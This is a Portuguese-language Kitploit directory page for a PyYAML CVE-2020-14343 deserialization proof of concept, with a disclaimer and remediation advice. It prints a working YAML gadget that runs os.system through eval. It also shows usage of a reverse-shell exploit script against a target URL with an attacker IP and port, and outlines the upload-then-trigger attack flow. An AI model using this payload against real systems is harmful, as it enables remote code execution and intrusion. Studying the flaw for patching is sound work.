Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-14343-PyYAML — Payload do CVE-2020-14343 | Kitploit
Ferramentas/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

Payload do CVE-2020-14343

Ver Repositório
2há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-14343 POC da vulnerabilidade de desserialização PyYAML

Visão geral da vulnerabilidade

Baixar ferramenta
CampoInformação
Número do CVECVE-2020-14343
Componente afetadoPyYAML < 5.4
Tipo de vulnerabilidadeExecução remota de código por desserialização (RCE)
Nível de gravidadeAlta

Princípio da vulnerabilidade

Quando o PyYAML usa yaml.load() para analisar dados não confiáveis, ele não restringe tags YAML perigosas (como !!python/object), permitindo que um atacante construa conteúdo YAML malicioso para executar código Python arbitrário.

Núcleo do Payload:

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

Como usar

root@kitploit:~
python poc.py <目标URL> <攻击者IP> <监听端口>

Exemplo:

root@kitploit:~
python poc.py http://vulnerable-site.com 192.168.1.100 4444

Fluxo de ataque

  1. O script inicia um listener TCP localmente
  2. Envia um arquivo YAML malicioso para o endpoint /upload do alvo
  3. Aciona o endpoint /login para carregar e analisar o YAML
  4. O servidor alvo executa o payload e devolve um shell reverso para o atacante

Instalação de dependências

root@kitploit:~
pip install requests

Isenção de responsabilidade

⚠️ Esta ferramenta destina-se exclusivamente a pesquisa de segurança e testes autorizados!

  • Não use para fins ilegais
  • Antes de usar, certifique-se de que obteve autorização do sistema alvo
  • O autor não se responsabiliza por qualquer uso indevido

Recomendações de correção

  1. Use yaml.safe_load() em vez de yaml.load()
  2. Atualize o PyYAML para a versão 5.4 ou superior
  3. Valide rigorosamente a entrada do usuário

Links de referência

  • CVE-2020-14343 - NVD
  • Documentação oficial do PyYAML